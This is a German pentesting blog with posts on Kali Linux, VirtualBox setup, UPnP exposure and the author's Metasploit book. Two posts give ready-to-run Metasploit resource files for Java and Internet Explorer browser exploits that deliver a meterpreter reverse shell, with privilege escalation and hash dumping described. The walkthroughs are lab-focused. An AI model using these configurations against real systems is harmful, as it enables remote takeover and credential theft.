Auf der Webseite der dpunkt.verlag GmbH sind jetzt Inhaltsangaben und Leseproben zur 2. Auflage meines Besuches “Penetration Testing mit Metasploit” erschienen. Es wird voraussichtlich ab ersten Juni verfügbar sein.
Hiermit möchte ich mich nochmal ganz besonders bei Christian Kirsch von Rapid7 für die Zusammenarbeit und HD Moore für das Geleitwort zum Buch bedanken.
Kali-Linux lässt sich problemlos unter VirtualBox einrichten. Bei der Installation der Guest-Edition muss man allerdings einiges beachten. Zunächst richtet man Kali-Linux unter VirtualBox als neue virtuelle Maschine ein. Eine gute Anleitung findet man z.B. hier.
Bei der Installation wird man aufgefordert das root Passwort einzugeben. Nach dem Neustart meldet man sich als root an und sollte als erstes die Guest-Edition von VirtualBox einrichten. Hier geht man wie folgt vor.
Starten sie zunächst die Gastinstallation mittels klick auf Ändern – Gasterweiterung installieren. Nun wird die notwendige Software als CD-Image bereitgestellt.
Offensive Security hat heute den BackTrack Nachfolger Kali-Linux vorgestellt. Damit wurde ein Neustart vollzogen, der mit Altlasten aufräumt und eine effektive und flexible Nutzung in der Zukunft gewährleistet. Während BackTrack auf Ubuntu aufgebaut war, nutzt Kali-Linux nun Debian. Im Gegensatz zum Vorgänger ist Kali-Linux strukturiert aufgebaut. Dies erleichtert die Pflege des Systems und ermöglicht eine flexible Zusammenstellung der benötigten Komponenten. Der Nutzer kann aus mehreren Desktop-Umgebungen (z.B. KDE, LXDE, XFCE) auswählen und ist somit in der Lage, die Software seinen speziellen Anforderungen auszupassen.
Neben den üblichen 32- und 64-Bit-Versionen wird Kali-Linux auch für ARM-Umgebungen angeboten. Die Software lässt sich u.a. auch auf dem Mini-Rechner Rasperry Pi, dem Chrombook von Samsung oder einem SainSmart SS808 im Stick-Format installieren. Diese neue Distribution soll eine großen Anzahl von WLAN-Interfaces unterstützen.
Der BackTrack Nachfolger kein hier runtergeladen werden. Natürlich engagiert sich Rapid7 weiterhin in diesem Projekt. Das Metasploit-Framework und die grafischen Oberflächen ( z.B. Metasploit Community) sind in der neuen Version selbstverständlich enthalten. Die wichtigsten Antworten zur Integration vom Metasploit in Kali-Linux findet man hier. Rapid7 hat diesem Thema einen eigenen Blog-Eintrag gewidmet.
Üblicherweise wird Universal Plug and Play (UPnP) zur Ansteuerung von Geräten im lokalen Netzwerk genutzt. Dies können sowohl Audio-Geräte als auch Drucker, Router, NAS-Geräte bzw. Haushaltssteuerungen sein. Mit diesem Protokoll lassen sich Steuerbefehle über ein IP-basierendes Netzwerk austauschen und somit die Kommunikation zwischen den einzelnen Geräten komfortabel und ohne großen Konfigurationsaufwand gestalten.
Normalerweise stellt dieser Dienst in einem lokalen Netzwerk kein Problem dar. Problematisch wird es aber, wenn diese Geräte nicht nur auf Anfragen aus dem lokalen Netz antworten, sondern auch aus dem Internet.
Rapid7 fand bei eigenen Recherchen heraus, dass über 80 Millionen Geräten (sie sprechen von einzelnen IP-Adressen) über das Internet erreichbar sind. Betroffen sind davon laut Rapid7 Geräte von über 1500 Herstellern. Darunter fallen z.B. D-Link, Fujitsu, Huawei, Logitech, Netgear, Siemens, Sony, TP-Link und Zyxel. Bislang sollen Geräte von AVM (z.B. FritzBox) und der Deutschen Telekom nicht betroffen sein.
Somit bekommen potenzielle Angreifer die Gelegenheit, vorhandene Schwachstellen der Firmware der einzelnen Geräte auszunutzen und so möglicherweise in das lokale Netzwerk einzudringen.
Etwa 40 bis 50 Millionen Geräte sollen nach Rapid7 mit UPnP-Schwachstellen behaftet sein. Viele wurden schon in den letzten 12 Jahren entdeckt und diskutiert. Trotzdem setzen viele Hersteller die fehlerhafte Software als Firmware in ihren Produkten ein bzw. empfanden es nicht als notwendig, die Fehler zu beseitigen.
Backtrack wurde ursprünglich für den persönlichen Gebrauch der Mitarbeiter von Offensive Security entwickelt. Mittlerweile hat die Software einen hohen Verbreitungsgrad erreicht. Pentester auf der ganzen Welt nutzen dieses erstklassige Werkzeug.
Schon vor etwa einem Jahr haben aber die Entwickler von Backtrack sich darüber Gedanken gemacht, wie sie die Zukunft dieser auf Ubuntu-Linux basierenden Software gestalten können. Dazu wurde eine lange Liste mit Feature erstellt, die nach und nach in eine neue Distribution eingearbeitet werden sollten. Die Entwickler merkten aber recht früh, dass die Ziele nur durch eine massive Umstellung der Struktur der vorhandenen Software zu erreichen sind. Deshalb wurde in der Zwischenzeit die Infrastruktur zur Entwicklung einen neuen Linux Distribution für Penetrationstester aufgebaut. Des Weiteren wurden über 300 neue Debian-Pakete in 8 verschiedenen Sprachen in ein eigenes Repository gepackt. Nach den Aussagen der Mitarbeiter von Offensive Security wurde somit die beste und flexibelste Distribution für Penetrationstester geschaffen. Sie nennen ihr Produkt Kali-Linux.
Einen Veröffentlichungstermin geben die Entwickler allerdings noch nicht preis. Sie sprechen aber davon, dass die Arbeiten schon sehr weit fortgeschritten sind und die erste Ausgabe bald erscheinen wird.
Ein Video zur Ankündigung des Produktes ist aber schon verfügbar.
Für die neuentdeckte Java-Schwachstelle (bis Java-Version 7 Update 10) hat Rapid7 ein Modul entwickelt, das ich in diesem Blog kurz vorstellen will. Der Exploit sollte auf den gängigen Betriebssystemen (Windows, Linux und OSX) funktionieren. Als Payload habe ich java/meterpreter/reverse_https verwendet.
Zur einfacheren Handhabung kann man sich folgende Resource-Datei erstellen.
use exploit/multi/browser/java_jre17_jmxbean
set srvport 80
set uripath /
set payload java/meterpreter/reverse_https
set lport 443
set lhost 192.168.111.215
show options
Der Exploit ist nicht für ältere Versionen von Java geeignet (Java 6 und jünger). Diese Versionen sind aber mit anderen Schwachstellen behaftet.
Ein kurzes Video findet man hier:
Oracle hat eine Update (Version 7 Update 11) bereitgestellt, dass die Schwachstelle bereinigen soll.
Die Metasploit-Entwickler nutzen schon seit etwa einem guten Jahr GitHub als Plattform zur Verwaltung des Quellcodes. Alle Anwender konnten aber weiterhin SVN nutzen. Dies hat aber in der letzten Zeit immer wieder zu Problemen geführt. Nutzer von Backtrack 5 R3 werden beim nächsten Upgrade des Systems automatisch auf das Git-System umgestellt.
Im Buch habe ich den Aufbau einer Testumgebung mittels Virtualbox und phpvirtualbox beschrieben. Dabei wurde Ubuntu 10.04 LTS Lucid mit einem Apache Webserver und PHP5 genutzt. Hier möchte ich das Upgrade auf die aktuelle Version von Virtualbox (im Moment 4.2) und phpvirtualbox (4.2.4) kurz beschreiben.
In einem ersten Schritt werden die bereits installierten Programmpakete aktualisiert und danach die neue Version von Virtualbox installiert. Da wir bereits das Virtualbox-Reposity in das Quellverzeichnis aufgenommen haben (siehe Buch Seite 9), sollte auch die neue Version über den apt-get Befehl verfügbar sein.
apt-get update
apt-get upgrade
apt-get install virtualbox-4.2
Der VirtualBox Extension Pack sollte nun auch erneuert werden. Das Herunterladen und die Installation sollte wie folgt erledigt werden:
cd /home
http://download.virtualbox.org/virtualbox/4.2.6/Oracle_VM_VirtualBox_Extension_Pack-4.2.6-82870.vbox-extpack
VBoxManage extpack install --replace Oracle_VM_VirtualBox_Extension_Pack-4.2.6-82870.vbox-extpack
Als nächstes wird die aktuelle Version von phpvirtualbox in das home-Verzeichnis heruntergeladen.
cd /home/
wget http://phpvirtualbox.googlecode.com/files/phpvirtualbox-4.2-4.zip
Diese neue Sicherheitslücke im Internet Explorer wurde von Sicherheitsexperten der Firma FireEye entdeckt nachdem sie eine Analyse von kompromittierten Webseiten erstellt hatten. Durch diese Lücke hatten Angreifer Schadcode in die Systeme von IE-Nutzers einschleust, wenn sie diese speziell präparierte Webseite besucht hatten. Die Angreifer hatten zunächst mit Hilfe eins Flash-Applets Shellcode im Arbeitsspeicher verteilt (Heap Spraying), um dann unter Ausnutzung dieser IE Schwachstelle gezielt eigenen Code auszuführen.
Der Angriff war ursprünglich auf Nutzer der Systemsprache US-Englisch, Chinesisch, Japanisch, Koreanisch oder Russisch ausgerichtet. Betroffen sind die Versionen 6 bis 8 des Internet Explorers. Zum gegenwärtigen Stand ist die Sicherheitslücke nicht geschlossen.
Die Entwickler von Metasploit haben einen Exploit für diese Schwachstelle entwickelt. Nach meinen Test funktioniert er derzeit nur auf englischsprachigen Systemen. Im nachfolgenden Video nutze ich Windows XP Home. Interessant ist auch hier, dass der installierte Virenschutz (hier Microsoft Security Essentials in der aktuellen Version) keine Hürde darstellt.
Greetings to all participants! Special Thanks to the London 2012-SANS 560 Team, particularly to Bryce Galbraith as an excellent instructor.
Greetings to Markus and the rest of the winning team. Good luck for the future.
Für den Lehrgang sollte ein eigener Laptop zur Verfügung stehen. Als Hostbetriebssystem eignet sich Windows, Linux oder MacOS. Als Software sollte VMWare Player oder Workstation vorhanden sein. Ein VMWare- Image (Linux-Fedora) mit allen Tools wird auf DVD zur Verfügung gestellt. Die Verwendung eines Windows-Systems (als VMWare oder als Host) ist dringend zu empfehlen. Hier ein Überblick über den Inhalt des Kurses:
Am 17.09.2012 wurde eine kritische Schwachstelle Microsoft Internet Explorer bekannt. Betroffen sind IT-Systeme, die die Software in den Versionen 6, 7, 8 oder 9 unter den Betriebssystemen Microsoft Windows XP, Microsoft Windows Vista oder Microsoft Windows 7 verwenden. Die Schwachstelle wird bereits in gezielten Angriffen ausgenutzt. Um die Schwachstelle auszunutzen reicht es aus, den Internetnutzer auf eine präparierte Webseite zu locken. Beim Anzeigen dieser Webseite kann dann durch Ausnutzen der Schwachstelle beliebiger Code auf dem betroffenen System mit den Rechten des Nutzers ausgeführt werden.
Um die eigenen Systeme testen zu können, wurde ein Metasploit-Modul herausgebraucht.
Im Folgenden wird die Handhabung in einem Testnetzwerk kurz beschrieben und in einem Video erläutert. Der Angreifer nutzt Backtrack 5 R3 (IP: 192.168.222.16) und das Metasploit-Framework. Auf dem Zielsystem (IP: 192.168.222.71) ist Windows 7 und der Internet Explorer 8 installiert.
Mittels der folgenden Resource-Datei (ie0day.rc) wird das entsprechende Module geladen, die Serverparameter eingestellt und der Payload ausgewählt. Nach der Ausführung nimmt das Angriffssystem „Anfragen“ auf Port 80 entgegen.
use exploit/windows/browser/ie_execcommand_uaf
set SRVHOST 192.168.222.16
set SRVPORT 80
set PAYLOAD windows/meterpreter/reverse_https
set LHOST 192.168.222.16
set LPORT 443
set URIPATH /
exploit
Sobald das Zielsytem die URL http://192.168.222.16 im Internet Explorer öffnet, wird der Exploit ausgeführt und der entsprechende Payload (in diesem Fall windows/meterpreter/reverse_https) nachgeladen. Nun können beliebige Meterpreter-Skripte ausgeführt werden. Im Video werden die Nutzerrechte zu Systemrechten eskaliert und die Passwort-Hashes ausgelesen.
Update 22.09.12: Microsoft hat die Internet-Explorer-Lücke mit einem Patch geschlossen. Ein Update wird dringend empfohlen.
| M | D | M | D | F | S | S |
|---|---|---|---|---|---|---|
| « Mrz | ||||||
| 1 | 2 | |||||
| 3 | 4 | 5 | 6 | 7 | 8 | 9 |
| 10 | 11 | 12 | 13 | 14 | 15 | 16 |
| 17 | 18 | 19 | 20 | 21 | 22 | 23 |
| 24 | 25 | 26 | 27 | 28 | 29 | 30 |